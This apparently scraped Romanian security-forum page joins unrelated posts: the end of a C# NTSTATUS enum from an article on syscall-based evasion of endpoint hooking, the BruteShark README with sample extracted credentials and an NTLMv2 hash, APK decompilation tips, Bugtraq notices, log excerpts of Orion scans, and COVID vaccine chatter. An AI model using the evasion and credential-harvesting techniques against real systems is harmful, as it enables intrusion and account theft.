0x00000080, AbandonedWait1 = 0x00000081, AbandonedWait2 = 0x00000082, AbandonedWait3 = 0x00000083, AbandonedWait63 = 0x000000bf, UserApc = 0x000000c0, KernelApc = 0x00000100, Alerted = 0x00000101, Timeout = 0x00000102, Pending = 0x00000103, Reparse = 0x00000104, MoreEntries = 0x00000105, NotAllAssigned = 0x00000106, SomeNotMapped = 0x00000107, OpLockBreakInProgress = 0x00000108, VolumeMounted = 0x00000109, RxActCommitted = 0x0000010a, NotifyCleanup = 0x0000010b, NotifyEnumDir = 0x0000010c, NoQuotasForAccount = 0x0000010d, PrimaryTransportConnectFailed = 0x0000010e, PageFaultTransition = 0x00000110, PageFaultDemandZero = 0x00000111, PageFaultCopyOnWrite = 0x00000112, PageFaultGuardPage = 0x00000113, PageFaultPagingFile = 0x00000114, CrashDump = 0x00000116, ReparseObject = 0x00000118, NothingToTerminate = 0x00000122, ProcessNotInJob = 0x00000123, ProcessInJob = 0x00000124, ProcessCloned = 0x00000129, FileLockedWithOnlyReaders = 0x0000012a, FileLockedWithWriters = 0x0000012b, // Informational Informational = 0x40000000, ObjectNameExists = 0x40000000, ThreadWasSuspended = 0x40000001, WorkingSetLimitRange = 0x40000002, ImageNotAtBase = 0x40000003, RegistryRecovered = 0x40000009, // Warning Warning = 0x80000000, GuardPageViolation = 0x80000001, DatatypeMisalignment = 0x80000002, Breakpoint = 0x80000003, SingleStep = 0x80000004, BufferOverflow = 0x80000005, NoMoreFiles = 0x80000006, HandlesClosed = 0x8000000a, PartialCopy = 0x8000000d, DeviceBusy = 0x80000011, InvalidEaName = 0x80000013, EaListInconsistent = 0x80000014, NoMoreEntries = 0x8000001a, LongJump = 0x80000026, DllMightBeInsecure = 0x8000002b, // Error Error = 0xc0000000, Unsuccessful = 0xc0000001, NotImplemented = 0xc0000002, InvalidInfoClass = 0xc0000003, InfoLengthMismatch = 0xc0000004, AccessViolation = 0xc0000005, InPageError = 0xc0000006, PagefileQuota = 0xc0000007, InvalidHandle = 0xc0000008, BadInitialStack = 0xc0000009, BadInitialPc = 0xc000000a, InvalidCid = 0xc000000b, TimerNotCanceled = 0xc000000c, InvalidParameter = 0xc000000d, NoSuchDevice = 0xc000000e, NoSuchFile = 0xc000000f, InvalidDeviceRequest = 0xc0000010, EndOfFile = 0xc0000011, WrongVolume = 0xc0000012, NoMediaInDevice = 0xc0000013, NoMemory = 0xc0000017, ConflictingAddresses = 0xc0000018, NotMappedView = 0xc0000019, UnableToFreeVm = 0xc000001a, UnableToDeleteSection = 0xc000001b, IllegalInstruction = 0xc000001d, AlreadyCommitted = 0xc0000021, AccessDenied = 0xc0000022, BufferTooSmall = 0xc0000023, ObjectTypeMismatch = 0xc0000024, NonContinuableException = 0xc0000025, BadStack = 0xc0000028, NotLocked = 0xc000002a, NotCommitted = 0xc000002d, InvalidParameterMix = 0xc0000030, ObjectNameInvalid = 0xc0000033, ObjectNameNotFound = 0xc0000034, ObjectNameCollision = 0xc0000035, ObjectPathInvalid = 0xc0000039, ObjectPathNotFound = 0xc000003a, ObjectPathSyntaxBad = 0xc000003b, DataOverrun = 0xc000003c, DataLate = 0xc000003d, DataError = 0xc000003e, CrcError = 0xc000003f, SectionTooBig = 0xc0000040, PortConnectionRefused = 0xc0000041, InvalidPortHandle = 0xc0000042, SharingViolation = 0xc0000043, QuotaExceeded = 0xc0000044, InvalidPageProtection = 0xc0000045, MutantNotOwned = 0xc0000046, SemaphoreLimitExceeded = 0xc0000047, PortAlreadySet = 0xc0000048, SectionNotImage = 0xc0000049, SuspendCountExceeded = 0xc000004a, ThreadIsTerminating = 0xc000004b, BadWorkingSetLimit = 0xc000004c, IncompatibleFileMap = 0xc000004d, SectionProtection = 0xc000004e, EasNotSupported = 0xc000004f, EaTooLarge = 0xc0000050, NonExistentEaEntry = 0xc0000051, NoEasOnFile = 0xc0000052, EaCorruptError = 0xc0000053, FileLockConflict = 0xc0000054, LockNotGranted = 0xc0000055, DeletePending = 0xc0000056, CtlFileNotSupported = 0xc0000057, UnknownRevision = 0xc0000058, RevisionMismatch = 0xc0000059, InvalidOwner = 0xc000005a, InvalidPrimaryGroup = 0xc000005b, NoImpersonationToken = 0xc000005c, CantDisableMandatory = 0xc000005d, NoLogonServers = 0xc000005e, NoSuchLogonSession = 0xc000005f, NoSuchPrivilege = 0xc0000060, PrivilegeNotHeld = 0xc0000061, InvalidAccountName = 0xc0000062, UserExists = 0xc0000063, NoSuchUser = 0xc0000064, GroupExists = 0xc0000065, NoSuchGroup = 0xc0000066, MemberInGroup = 0xc0000067, MemberNotInGroup = 0xc0000068, LastAdmin = 0xc0000069, WrongPassword = 0xc000006a, IllFormedPassword = 0xc000006b, PasswordRestriction = 0xc000006c, LogonFailure = 0xc000006d, AccountRestriction = 0xc000006e, InvalidLogonHours = 0xc000006f, InvalidWorkstation = 0xc0000070, PasswordExpired = 0xc0000071, AccountDisabled = 0xc0000072, NoneMapped = 0xc0000073, TooManyLuidsRequested = 0xc0000074, LuidsExhausted = 0xc0000075, InvalidSubAuthority = 0xc0000076, InvalidAcl = 0xc0000077, InvalidSid = 0xc0000078, InvalidSecurityDescr = 0xc0000079, ProcedureNotFound = 0xc000007a, InvalidImageFormat = 0xc000007b, NoToken = 0xc000007c, BadInheritanceAcl = 0xc000007d, RangeNotLocked = 0xc000007e, DiskFull = 0xc000007f, ServerDisabled = 0xc0000080, ServerNotDisabled = 0xc0000081, TooManyGuidsRequested = 0xc0000082, GuidsExhausted = 0xc0000083, InvalidIdAuthority = 0xc0000084, AgentsExhausted = 0xc0000085, InvalidVolumeLabel = 0xc0000086, SectionNotExtended = 0xc0000087, NotMappedData = 0xc0000088, ResourceDataNotFound = 0xc0000089, ResourceTypeNotFound = 0xc000008a, ResourceNameNotFound = 0xc000008b, ArrayBoundsExceeded = 0xc000008c, FloatDenormalOperand = 0xc000008d, FloatDivideByZero = 0xc000008e, FloatInexactResult = 0xc000008f, FloatInvalidOperation = 0xc0000090, FloatOverflow = 0xc0000091, FloatStackCheck = 0xc0000092, FloatUnderflow = 0xc0000093, IntegerDivideByZero = 0xc0000094, IntegerOverflow = 0xc0000095, PrivilegedInstruction = 0xc0000096, TooManyPagingFiles = 0xc0000097, FileInvalid = 0xc0000098, InsufficientResources = 0xc000009a, InstanceNotAvailable = 0xc00000ab, PipeNotAvailable = 0xc00000ac, InvalidPipeState = 0xc00000ad, PipeBusy = 0xc00000ae, IllegalFunction = 0xc00000af, PipeDisconnected = 0xc00000b0, PipeClosing = 0xc00000b1, PipeConnected = 0xc00000b2, PipeListening = 0xc00000b3, InvalidReadMode = 0xc00000b4, IoTimeout = 0xc00000b5, FileForcedClosed = 0xc00000b6, ProfilingNotStarted = 0xc00000b7, ProfilingNotStopped = 0xc00000b8, NotSameDevice = 0xc00000d4, FileRenamed = 0xc00000d5, CantWait = 0xc00000d8, PipeEmpty = 0xc00000d9, CantTerminateSelf = 0xc00000db, InternalError = 0xc00000e5, InvalidParameter1 = 0xc00000ef, InvalidParameter2 = 0xc00000f0, InvalidParameter3 = 0xc00000f1, InvalidParameter4 = 0xc00000f2, InvalidParameter5 = 0xc00000f3, InvalidParameter6 = 0xc00000f4, InvalidParameter7 = 0xc00000f5, InvalidParameter8 = 0xc00000f6, InvalidParameter9 = 0xc00000f7, InvalidParameter10 = 0xc00000f8, InvalidParameter11 = 0xc00000f9, InvalidParameter12 = 0xc00000fa, ProcessIsTerminating = 0xc000010a, MappedFileSizeZero = 0xc000011e, TooManyOpenedFiles = 0xc000011f, Cancelled = 0xc0000120, CannotDelete = 0xc0000121, InvalidComputerName = 0xc0000122, FileDeleted = 0xc0000123, SpecialAccount = 0xc0000124, SpecialGroup = 0xc0000125, SpecialUser = 0xc0000126, MembersPrimaryGroup = 0xc0000127, FileClosed = 0xc0000128, TooManyThreads = 0xc0000129, ThreadNotInProcess = 0xc000012a, TokenAlreadyInUse = 0xc000012b, PagefileQuotaExceeded = 0xc000012c, CommitmentLimit = 0xc000012d, InvalidImageLeFormat = 0xc000012e, InvalidImageNotMz = 0xc000012f, InvalidImageProtect = 0xc0000130, InvalidImageWin16 = 0xc0000131, LogonServer = 0xc0000132, DifferenceAtDc = 0xc0000133, SynchronizationRequired = 0xc0000134, DllNotFound = 0xc0000135, IoPrivilegeFailed = 0xc0000137, OrdinalNotFound = 0xc0000138, EntryPointNotFound = 0xc0000139, ControlCExit = 0xc000013a, InvalidAddress = 0xc0000141, PortNotSet = 0xc0000353, DebuggerInactive = 0xc0000354, CallbackBypass = 0xc0000503, PortClosed = 0xc0000700, MessageLost = 0xc0000701, InvalidMessage = 0xc0000702, RequestCanceled = 0xc0000703, RecursiveDispatch = 0xc0000704, LpcReceiveBufferExpected = 0xc0000705, LpcInvalidConnectionUsage = 0xc0000706, LpcRequestsNotAllowed = 0xc0000707, ResourceInUse = 0xc0000708, ProcessIsProtected = 0xc0000712, VolumeDirty = 0xc0000806, FileCheckedOut = 0xc0000901, CheckOutRequired = 0xc0000902, BadFileType = 0xc0000903, FileTooLarge = 0xc0000904, FormsAuthRequired = 0xc0000905, VirusInfected = 0xc0000906, VirusDeleted = 0xc0000907, TransactionalConflict = 0xc0190001, InvalidTransaction = 0xc0190002, TransactionNotActive = 0xc0190003, TmInitializationFailed = 0xc0190004, RmNotActive = 0xc0190005, RmMetadataCorrupt = 0xc0190006, TransactionNotJoined = 0xc0190007, DirectoryNotRm = 0xc0190008, CouldNotResizeLog = 0xc0190009, TransactionsUnsupportedRemote = 0xc019000a, LogResizeInvalidSize = 0xc019000b, RemoteFileVersionMismatch = 0xc019000c, CrmProtocolAlreadyExists = 0xc019000f, TransactionPropagationFailed = 0xc0190010, CrmProtocolNotFound = 0xc0190011, TransactionSuperiorExists = 0xc0190012, TransactionRequestNotValid = 0xc0190013, TransactionNotRequested = 0xc0190014, TransactionAlreadyAborted = 0xc0190015, TransactionAlreadyCommitted = 0xc0190016, TransactionInvalidMarshallBuffer = 0xc0190017, CurrentTransactionNotValid = 0xc0190018, LogGrowthFailed = 0xc0190019, ObjectNoLongerExists = 0xc0190021, StreamMiniversionNotFound = 0xc0190022, StreamMiniversionNotValid = 0xc0190023, MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024, CantOpenMiniversionWithModifyIntent = 0xc0190025, CantCreateMoreStreamMiniversions = 0xc0190026, HandleNoLongerValid = 0xc0190028, NoTxfMetadata = 0xc0190029, LogCorruptionDetected = 0xc0190030, CantRecoverWithHandleOpen = 0xc0190031, RmDisconnected = 0xc0190032, EnlistmentNotSuperior = 0xc0190033, RecoveryNotNeeded = 0xc0190034, RmAlreadyStarted = 0xc0190035, FileIdentityNotPersistent = 0xc0190036, CantBreakTransactionalDependency = 0xc0190037, CantCrossRmBoundary = 0xc0190038, TxfDirNotEmpty = 0xc0190039, IndoubtTransactionsExist = 0xc019003a, TmVolatile = 0xc019003b, RollbackTimerExpired = 0xc019003c, TxfAttributeCorrupt = 0xc019003d, EfsNotAllowedInTransaction = 0xc019003e, TransactionalOpenNotAllowed = 0xc019003f, TransactedMappingUnsupportedRemote = 0xc0190040, TxfMetadataAlreadyPresent = 0xc0190041, TransactionScopeCallbacksNotSet = 0xc0190042, TransactionRequiredPromotion = 0xc0190043, CannotExecuteFileInTransaction = 0xc0190044, TransactionsNotFrozen = 0xc0190045, MaximumNtStatus = 0xffffffff } } } This is definately not as straight forward as using P/Invoke, but it’s a very effective means of evading defensive products that employ userland hooking. API Monitor does not detect the use of these APIs - but feel free to verify that for yourself! Sursa: https://offensivedefence.co.uk/posts/dinvoke-syscalls/

About What it can do Download Examples Usage Modules BruteSharkDesktop BruteSharkCli Architecture Contributing About BruteShark is a Network Forensic Analysis Tool (NFAT) that performs deep processing and inspection of network traffic (mainly PCAP files). It includes: password extracting, building a network map, reconstruct TCP sessions, extract hashes of encrypted passwords and even convert them to a Hashcat format in order to perform an offline Brute Force attack. The main goal of the project is to provide solution to security researchers and network administrators with the task of network traffic analysis while they try to identify weaknesses that can be used by a potential attacker to gain access to critical points on the network. Two BruteShark versions are available, A GUI based application (Windows) and a Command Line Interface tool (Windows and Linux). The various projects in the solution can also be used independently as infrastructure for analyzing network traffic on Linux or Windows machines. For further details see the Architecture section. The project was developed in my spare time to address two main passions of mine: software architecture and analyzing network data. I love to get feedbacks from BruteShark users, your opinion is important to me! Feel free to contact me on contact.oded.shimon@gmail.com or create new issue. Please ⭐️ this repository if this project helped you! Also, if you're feeling generous, you can buy me a coffe What it can do Extracting and encoding usernames and passwords (HTTP, FTP, Telnet, IMAP, SMTP...) Extract authentication hashes and crack them using Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...) Build visual network diagram (Network nodes & users) Extract DNS queries Reconstruct all TCP & UDP Sessions File Carving Download Windows Prerequisites: WinPcap / Npcap driver (Wireshark installs one of this by default) .NET Core SDK Download Windows Installer (64 Bit). Linux Prerequisites: libpcap driver Download BruteSharkCli and just run it: # Create a symbolyc link between libpcap.so and the actual libpcap file (e.g. libpcap.so.0.8) # That needed due to a known issue in SharpPcap (https://github.com/chmorgan/sharppcap/issues/167) find /usr/lib/x86_64-linux-gnu -type f | grep libpcap | head -1 | xargs -i sudo ln -s {} /usr/lib/x86_64-linux-gnu/libpcap.so wget https://github.com/odedshimon/BruteShark/releases/latest/download/BruteSharkCli ./BruteSharkCli Examples Videos How do i crack (by mistake!) Windows 10 user NTLM password Run Brute Shark CLI on Ubuntu with Mono Hashes Extracting Building a Network Diagram File Carving Password Extracting Reconstruct all TCP Sessions Brute Shark CLI Usage In general, it is recommended to use the example PCAP files folder, load, run and explore the results. Modules BruteShark is a modular tool, designed for expansion. Credentials Module This module is responsible for extracting and encoding usernames and passwords as well as authentication hashes. In fact this module is responsible for updating two display tables, passwords table and hashes table. While usernames and passwords are straight forward to use, hashes most often used in more complex attacks like pass-the-hash or by brute-forcing them to get the password. BruteShark is integrated with Hashcat so all the hashes extracted can be converted to a Hashcat input file. Protocol Hash Type Hascat Mode (-m) HTTP HTTP-Digest 11400 SMTP\IMAP CRAM-MD5 16400 NTLM (e.g. SMB) NTLMv1 5500 NTLM (e.g. SMB) NTLMv2 5600 Kerberos AS-REQ etype 23 7500 Kerberos TGS-REP etype 23 13100 Kerberos AS-REP etype 23 18200 Network Map Module This module is responsible for building the network map by identifying components in the network and the connections between them. The network map can be exported to JSON format for analysis with external tools such as Neo4j. Files Extracting Module This module tries to extract files from UDP / TCP sessions (Therefore, note that in order for this module to be effective, the "Build TCP Sessions" / "Build UDP Sessions" should be turn on). Currently this module supports classic forensics techniques of file carving by "Header-Footer" algorithm which is effective for files with known file header and footer like JPG, PNG, PDF. BruteSharkDesktop The GUI is pretty self-explanatory, just load the wanted files, configure the wanted modules and press the run button. BruteSharkCli BruteSharkCli has two modes: single command and shell mode. The single command mode works by geting all the relevant parameters for the processing and then printing the results to stdout or files. The shell mode allows to perform each step individually. Single Command Mode Print the help menu: C:\Users\King\Desktop\BruteSharkCli>BruteSharkCli.exe --help BruteSharkCli 1.0.0.0 Copyright c 2018 -d, --input-dir The input directory containing the files to be processed. -i, --input The files to be processed seperated by comma -m, --modules The modules to be separterd by comma: Credentials, FileExtracting, NetworkMap -o, --output Output direcorty for the results files. --help Display this help screen. --version Display version information. Get credentials from all files in a directory (passwords and hashes will be printed to stdout): C:\Users\King\Desktop\BruteSharkCli>BruteSharkCli.exe -m Credentials -d "C:\Users\King\Desktop\Pcap Files" [+] Started analyzing 5 files File : Ftp.pcap Processing Started Found: Network Credential: 192.168.0.114=>192.168.0.193(FTP) => csanders:echo File : Ftp.pcap Processing Finished File : HTTP - Basic Authentication.pcap Processing Started Found: Network Credential: 192.168.0.4=>192.254.189.169(HTTP Basic Authentication) => test:fail Found: Network Credential: 192.168.0.4=>192.254.189.169(HTTP Basic Authentication) => test:fail2 Found: Network Credential: 192.168.0.4=>192.254.189.169(HTTP Basic Authentication) => test:fail3 Found: Network Credential: 192.168.0.4=>192.254.189.169(HTTP Basic Authentication) => test:test File : HTTP - Basic Authentication.pcap Processing Finished File : IMAP - Authenticate CRAM-MD5.cap Processing Started Found: Hash: 10.0.2.101=>10.0.1.102:10.0.1.102(IMAP) CRAM-MD5 => aGVtbWluZ3dheSAyOWYyMGI2NjkzNDdhYTA4MTc0OTA2NWQ5MDNhNDllNA== File : IMAP - Authenticate CRAM-MD5.cap Processing Finished File : SMB - NTLMSSP (smb3 aes 128 ccm).pcap Processing Started Found: Hash: 10.160.64.139=>10.160.65.202:10.160.65.202(NTLMSSP) NTLMv2 => 39dbdbeb1bdd29b07a5d20c8f82f2cb701010000000000008a8ce7a9f4ced201e7969a04872c16890000000002000800530055005300450001000c0057005300320030003100360004000e0073007500730065002e006400650003001c005700530032003000310036002e0073007500730065002e006400650005000e0073007500730065002e0064006500070008008a8ce7a9f4ced20100000000 File : SMB - NTLMSSP (smb3 aes 128 ccm).pcap Processing Finished File : SMTP - Auth Login.pcap Processing Started Found: Network Credential: 10.10.1.4=>74.53.140.153(SMTP (Auth Login)) => gurpartap@patriots.in:punjab@123 File : SMTP - Auth Login.pcap Processing Finished [X] Bruteshark finished processing Get credentials from all files in a directory and also export extracted hashes (if found) to a Hashcat input files. BruteSharkCli.exe -m Credentials -d C:\Users\King\Desktop\Pcap_Examples -o C:\Users\King\Desktop\Results Run multiple modules on all files in a directory and also export all the results. BruteSharkCli.exe -m Credentials,NetworkMap,FileExtracting -d C:\Users\King\Desktop\Pcap_Examples -o C:\Users\King\Desktop\Results Shell Mode Just type BruteSharkCli.exe And then navigate using the following commands. Keyword Description help Print help menu exit Exit CLI add-file Add file to analyze. Usage: add-file FILE-PATH start Start analyzing show-passwords Print passwords. show-modules Print modules. show-hashes Print Hashes show-networkmap Prints the network map as a json string. Usage: show-networkmap export-hashes Export all Hashes to Hascat format input files. Usage: export-hashes OUTPUT-DIRECTORY export-networkmap Export network map to a json file for neo4j. Usage: export-networkmap OUTPUT-FILE Architecture All BruteShark projects are implemented using .Net Core and .Net Standard for modern and cross platform support. The solution is designed with three layer architecture, including a one or more projects at each layer - DAL, BLL and PL. The separation between layers is created by the fact that each project refers only its own objects. PcapProcessor (DAL) As the Data Access Layer, this project is responsible for reading raw PCAP files using appropriate drivers (WinPcap, libpcap) and the amazing wrapper library SharpPcap by Chris Morgan. Can analyze a list of files at once, and provides additional features like reconstruction of all TCP Sessions (using the awesome project TcpRecon). PcapAnalyzer (BLL) The Business Logic Layer, responsible for analyzing network information (packet, TCP Session etc.), implements a pluggable mechanism. Each plugin is basically a class that implements the interface IModule. All plugins are loaded using reflection: private void _initilyzeModulesList() { // Create an instance for any available modules by looking for every class that // implements IModule. this._modules = AppDomain.CurrentDomain.GetAssemblies() .SelectMany(s => s.GetTypes()) .Where(p => typeof(IModule).IsAssignableFrom(p) && !p.IsInterface) .Select(t => (IModule)Activator.CreateInstance(t)) .ToList(); // Register to each module event. foreach(var m in _modules) { m.ParsedItemDetected += (s, e) => this.ParsedItemDetected(s, e); } } BruteSharkDesktop (PL) Desktop application for Windows based on WinForms. Uses a cross-cutting project by the meaning it referrers both the DAL and BLL layers. This is done by composing each of the layers, register to their events, when event is triggered, cast the event object to the next layer equivalent object, and send it to next layer. public MainForm() { InitializeComponent(); _files = new HashSet<string>(); // Create the DAL and BLL objects. _processor = new PcapProcessor.Processor(); _analyzer = new PcapAnalyzer.Analyzer(); _processor.BuildTcpSessions = true; // Create the user controls. _networkMapUserControl = new NetworkMapUserControl(); _networkMapUserControl.Dock = DockStyle.Fill; _sessionsExplorerUserControl = new SessionsExplorerUserControl(); _sessionsExplorerUserControl.Dock = DockStyle.Fill; _hashesUserControl = new HashesUserControl(); _hashesUserControl.Dock = DockStyle.Fill; _passwordsUserControl = new GenericTableUserControl(); _passwordsUserControl.Dock = DockStyle.Fill; // Contract the events. _processor.TcpPacketArived += (s, e) => _analyzer.Analyze(Casting.CastProcessorTcpPacketToAnalyzerTcpPacket(e.Packet)); _processor.TcpSessionArived += (s, e) => _analyzer.Analyze(Casting.CastProcessorTcpSessionToAnalyzerTcpSession(e.TcpSession)); _processor.FileProcessingStarted += (s, e) => SwitchToMainThreadContext(() => OnFileProcessStart(s, e)); _processor.FileProcessingEnded += (s, e) => SwitchToMainThreadContext(() => OnFileProcessEnd(s, e)); _processor.ProcessingPrecentsChanged += (s, e) => SwitchToMainThreadContext(() => OnProcessingPrecentsChanged(s, e)); _analyzer.ParsedItemDetected += (s, e) => SwitchToMainThreadContext(() => OnParsedItemDetected(s, e)); _processor.TcpSessionArived += (s, e) => SwitchToMainThreadContext(() => OnSessionArived(Casting.CastProcessorTcpSessionToBruteSharkDesktopTcpSession(e.TcpSession))); _processor.ProcessingFinished += (s, e) => SwitchToMainThreadContext(() => OnProcessingFinished(s, e)); InitilizeFilesIconsList(); this.modulesTreeView.ExpandAll(); } Contributing First off, thanks for taking the time to contribute! BruteShark welcomes contributions from everyone. When contributing to this repository, please first discuss the change you wish to make via issue or an email before making a change. How Can You Contribute? Implemening new features from BruteShark Issues, look for "good first isuue" and "help wanted" labels. Uploading example PCAP files, especially files, with interesting content. Proposing new features by Creating an Issue. Reporting a bug by Creating an Issue. Discussing the current state of the code. Creating videos and example tutorials of using BruteShark. Sursa: https://github.com/odedshimon/BruteShark

Nu stiu daca e vreo solutie "usoara" la asa ceva. Probabil dezvoltatorii au contract de reclame cu cine stie ce firma si poate nici nu stiu ca asta se poate intampla, probabil afiseaza reclame aleator. Sau poate stiu ca si asta se poate intampla, dar de acolo iese banul. Ca sa faci ceva efectiv ai nevoie de un telefon cu jailbreak, teoretic poti modifica aplicatia, dar apoi nu stiu daca o mai poti rula pe un telefon fara jailbreak. Nu recomand acest jailbreak pentru folosire de zi cu zi, de catre persoane care nu stiu exact despre ce e vorba. Fa o analiza pe cea pentru Android, e mai simplu si nu ai nevoie nici macar de telefon. Ia link-ul aplicatiei si foloseste una dintre acele aplicatii online pentru "APK downloader". Iei APK si il extragi cu WinRAR/WinZip sau altceva. O sa ai un classes.dex (poate si classes2.dex) si folosesti "dex2jar" pentru a extrage JAR-ul. Iar JAR-ul il poti baga in "jd-gui" si vezi codul sursa. E destul de simplu pe Linux, le poti descarca direct, nu stiu daca sunt implicit in Kali, nu cred.

Salut, invata bine limbajul in sine, asta te va ajuta sa inveti apoi orice alt limbaj zic eu. Sugestia mea e sa citesti o carte si sa scrii cod. Nu stiu daca C++ e prea util sau foarte folosit la astfel de companii, la unele este! Apoi, invata si algoritmica. La companii gen Google si altele se pune accentul pe algoritmi si optimizari de cod. Vezi ca sunt si multe articole/tutoriale de genul "interviu la Google", o sa iti faci o idee despre asta.

The easiest solution would be to uninstall it and install it again, latest version. Restart(s) might be needed but it should work.

Bugtraq has been a valuable institution within the Cyber Security community for almost 30 years. Many of our own people entered the industry by subscribing to it and learning from it. So, based on the feedback we’ve received both from the community-at-large and internally, we’ve decided to keep the Bugtraq list running. We’ll be working in the coming weeks to ensure that it can remain a valuable asset to the community for years to come. - Accenture Security

Poliomielita a fost eradicata prin vaccinare in masa. Nu s-a intamplat la fel si pentru gripa. Nu cred ca se va intampla vreodata, simptomele nu sunt atat de vizibile ca la alti virusi (e.g. varicela, rujeola...) si nici rata de deces nu este atat de mare (cel putin la tineri). De aceea oamenii nu se streseaza si nu se vaccineaza (la noi in tara).

Nu cred ca se stie, insa cred ca tendinta e sa fie ceva mai nasol, probabil depinde de intervalul de reinfectare. Mai exact, sa presupunem ca prima infectie afecteaza 5% din plamani. Si e posibil ca aceasta problema sa nu se rezolve pana la urmatoarea infectare iar daca urmatoarea infectare afecteaza tot 5% vei avea un combo de 10%. Teoretic ma gandesc. Durata imunitatii depinde de fiecare, atat de sistemul imunitar si starea sa in fiecare infectie, cat si de "intensitatea" infectiei, ma refer la cat de mult virus intra in organism la infectare.

Salut, nu cred ca ai nevoie de vreun programel crackuit, fa un Live CD cu Kali Linux si ai acolo tot ce ai nevoie. Tutoriale sunt o gramada, chiar si in aceasta categorie de forum, sunt o gramada de tool-uri free iar unele au si interfata grafica.

Am deschis si eu acel link, cred ca si pe mine vor sa ma cunoasca fetele respective, sper sa nu fii gelos. Vestea buna e ca nu au penis. Vestea rea ca e un spam de 2 lei. Ignori si mergi mai departe.

2020 was quite the year, one that saw many changes. As we begin 2021, we wanted to send one last note to our friends and supporters at the SecurityFocus BugTraq mailing list. As many of you know, assets of Symantec were acquired by Broadcom in late 2019, and some of those assets were then acquired by Accenture in 2020 (https://newsroom.accenture.com/news/accenture-completes-acquisition-of-broadco ms-symantec-cyber-security- services-business.htm). SecurityFocus assets were included in this transition, and the mailing list has not been updated since the work to transition to Accenture began. The SecurityFocus assets, including the BugTraq mailing list, has a long history of providing timely information on the latest vulnerabilities, security vendor announcements, and exploit information. We are forever grateful to those who created, maintained, and contributed to the archive - many of us have connected and learned from each other through these lists. The history of the list and the sharing of the information has contributed to ensuring that we are building the information security community to be something stronger. Community contribution is one of the foundations to building a stronger Information Security force. At this time, resources for the BugTraq mailing list have not been prioritized, and this will be the last message to the list. The archive will be shut down January 31st, 2021. For similar information, please refer to some of the following links: https://www.defcon.org/html/links/mailing-lists.html https://seclists.org/fulldisclosure/ This is where the appropriate geek-like reference and farewell comes in, something like “So long, and thanks for all the fish”, but that seems too cavalier for this. So thank you, for your support, wisdom, and willingness to share – whether you are a contributor, reader, or lurker on the list. All of you have made a difference. Be well, and keep up the good work!

Te referi la antivirale? Vezi asta: https://medicamente.romedic.ro/info/medicamentele-antivirale Gandeste-te la Windows, de ce sa fii infectat cu ransomware si sa incerci sa scapi de el cu cine stie ce "cleaner" (care nu poate face mare lucru) cand poti avea un antivirus actualizat la zi care sa il previna? @gigiRoman - Nu stiu de unde ai informatiile acelea, nu a zis nimeni ca anticorpii dobanditi prin infectie dureaza 3 luni. Ideea cu vaccinul si acele 2 doze o reprezinta tocmai acest lucru: stimuleaza dobandirea anticorpilor in cel mai bun mod posibil, testat de catre ei. De aceea prima doza e mai mica si a doua mai mare, tocmai pentru ca anticorpii sa dureze mai mult, sa isi faca treaba celulele de memorie T (parca). Edit: Klaus s-a vaccinat: https://www.digi24.ro/stiri/actualitate/klaus-iohannis-se-vaccineaza-anti-covid-la-ora-10-00-1434453 , deci problema e pe jumatate rezolvata. O sa o fac si eu cand imi vine randul. Apropo, mi-a dat mesaj privat Klaus, cica chip-ul ii cere licenta, zicea sa-i dau cont de filelist sa isi descarce una, sau un crack, are cineva cont filelist de dat?

Util: https://www.nytimes.com/interactive/2020/health/oxford-astrazeneca-covid-19-vaccine.html Au uitat sa explice cum functioneaza chip-ul, dar in rest, pare frumos explicat.

Gresit. Asa au inventat "hentai"-ul.

Daca o sa pot, cand ma vaccinez, pun pe cineva sa ma filmeze. Dar stati linistit ca nu sunt fraier, ma duc cu folia de aluminiu si mi-o pun pe cap apoi, nu il las eu pe Bill sa ma controleze! Cat despre prima stire, normal ca se poate ca dupa prima doza sa te infectezi. Se poate si dupa a doua, dar sunt sanse foarte mici, adica acei 5%. Mama a inteles asta, probabil are un IQ mai mare ca tine si nu prea se "documenteaza" pe subiect. PS: Da, normal ca se monitorizeaza, se vrea sa se afle durata de timp a anticorpilor. Oricum difera de la persoana la persoana, dar sa se stie aproximativ cat de mult ajuta. Intre timp ai mai sus toata documentatia necesara referitoare la vaccin. Acolo sunt datele oficiale, tot ce ai nevoie sa stii despre el. Citeste-le si spune-ne si noua daca e ceva in neregula acolo.

Nu stiu daca informatiile se voiau publice, cel putin nu de la Agentia Europeana a Medicamentului. Acele fisiere par sa contina foarte multe detalii referitoare la vaccin, poate chiar totul, ceea ce inseamna ca si altii ar putea sa il reproduca. Codul sursa Pentru noi, oamenii de rand e bine. Putem sa il intelegem, in totalitate daca am si avea cunostiintele necesare. Si poate medicii cu experienta, microbiologii sau alte persoane pot sa deduca anumite lucruri de acolo, cum ar fi efectele la persoanele cu alergii.

Da, interesant, dar nu stiu cat ajuta. Probabil altii au facut asta cu mult timp inainte, fara intentii pozitive si fara sa anunte IP-ul folosit. Dar mi se pare ca evolueaza lucrurile si la noi. Testul oricum nu e intrusiv, nici nu ar trebui sa anunte, dar probabil sa nu panicheze pe cineva. De parca ar monitoriza cineva loguri si accesul pe acel fisier... Ca dovada, am dat un grep pe mizeria mea de site - www.xssfuzzer.com root@xssfuzzer:/var/log/apache2# grep -R Orion . ./access.log.1:162.243.128.120 - - [14/Dec/2020:04:29:57 +0000] "GET /Orion/Login.aspx HTTP/1.1" 404 3537 "-" "Mozilla/5.0 zgrab/0.x" ./access.log.1:145.220.25.28 - - [28/Dec/2020:02:44:00 +0000] "GET /Orion/WebResource.axd HTTP/1.1" 404 3537 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" Dragut.

Super, mersi mult! M-am uitat putin, vad niste mail-uri neinteresante si niste rapoarte, nu pare sa fie ceva confidential pe acolo. Am vazut intr-un docx structura si cateva detalii despre vaccin! Bine, nu inteleg mare lucru, dar e acolo. Daca va intreaba cineva ce contine acel vaccin le puteti da cu documentul ala in cap.

Am vazut si eu stirile acestea, dar nu am inteles ce ar contine acele documente. Are cineva acel leak?

E fake, stiu, dar daca nu tineti cont de asta e chiar emotionant... https://9gag.com/gag/aeDrrqQ

Daca are cere cont premium, fara reclame, pe WhatsApp, ar deveni reale (partial) acele mesaje idioate ca "WhatsApp nu o sa mai fie gratuit".

Relevant

